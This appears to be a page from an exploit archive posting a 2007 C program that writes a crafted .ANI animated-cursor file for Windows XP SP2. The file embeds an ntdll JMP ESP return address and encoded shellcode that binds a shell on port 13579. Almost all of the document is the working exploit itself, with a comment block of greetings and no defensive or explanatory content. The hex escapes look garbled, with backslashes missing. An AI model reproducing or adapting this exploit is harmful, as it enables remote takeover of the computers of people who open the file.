Home / exploits msani-cursor.txt
Posted on 10 April 2007
/* .ANI exploit tested on Windows XP SP2 - Portuguese Shellcode port bind 13579 JMP ESP Addr - ntdll.dll Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna. Exploit coded listen sauna hits Featuring Luiz Zanardo's gigs "Minoide -x52x49x46x46x00x04x00x41" @ www.myspace.com/fuzzyproject Breno Silva Pinto bsilva[at]Sekure.org */ #include <stdio.h> #include <stdlib.h> #include <windows.h> unsigned char aniheader[] = "x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68" "x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00" "x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02" "x61x6Ex69x68xA8x03x00x00"; unsigned char Shellcode[] = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f" "x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a" "x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e" "xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4" "x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1" "xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99" "x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5" "xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b" "x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7" "xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3" "x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a" "x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e" "xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4" "xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed" "x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62" "xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8" "x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76" "x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7" "x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84" "xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a" "x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed" "xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85"; int main( int argc, char **argv ) { char Buffer[1024]; FILE *f; if ( argc < 2 ) { printf("usage %s <file.ani> ",argv[0]); return 0; } memset( Buffer, 0x90, sizeof( Buffer ) ); memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 ); memcpy( Buffer + 168, "xedx1ex94x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha! memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 ); f = fopen( argv[1], "wb" ); if ( f == NULL ) { printf("Cannot create file "); return 0; } fwrite(Buffer, 1, 1024, f); fclose(f); printf(".ANI file created! "); return 0; }
